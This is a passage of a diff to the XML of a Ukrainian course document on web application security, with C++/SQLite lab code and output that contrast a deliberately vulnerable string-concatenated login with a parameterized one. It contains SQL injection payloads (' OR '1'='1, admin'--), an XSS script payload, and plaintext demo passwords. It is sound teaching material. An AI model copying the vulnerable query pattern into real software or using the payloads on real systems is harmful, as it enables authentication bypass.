-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    return found;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">int main() {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">              &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">              &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    WSACleanup();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4820,16 +4271,24 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Очікуваний результат:</w:t>
+    <w:bookmarkEnd w:id="23"/>
+    <w:bookmarkEnd w:id="24"/>
+    <w:bookmarkStart w:id="27" w:name="завдання-4-захист-веб-застосунку"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Завдання 4: Захист веб-застосунку</w:t>
+      </w:r>
+    </w:p>
+    <w:bookmarkStart w:id="25" w:name="демонстрація-sql-інєкції-та-захисту"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Демонстрація SQL-ін’єкції та захисту</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4877,247 +4336,811 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">============================================================</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">============================================================</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">--- Звичайний вхід ---</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">--- SQL-ін'єкція: admin'-- ---</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">АТАКА УСПІШНА! Увійшли без пароля.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">--- Той самий ввід через безпечний метод ---</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Результат: None</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Ін'єкція заблокована!</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">============================================================</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">============================================================</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Безпечно! Скрипт відображається як текст.</w:t>
+              <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// Паролі лежать відкрито лише для наочності атаки; у справжній системі</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// зберігають хеш Argon2id (лекція «Ідентифікація та аутентифікація»)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* schema =</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "VALUES ('admin', 'secret123', 'admin');"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        "VALUES ('user1', 'pass1', 'user');";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return db;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                     const std::string&amp; password) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит:\n  " &lt;&lt; query &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        return false;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
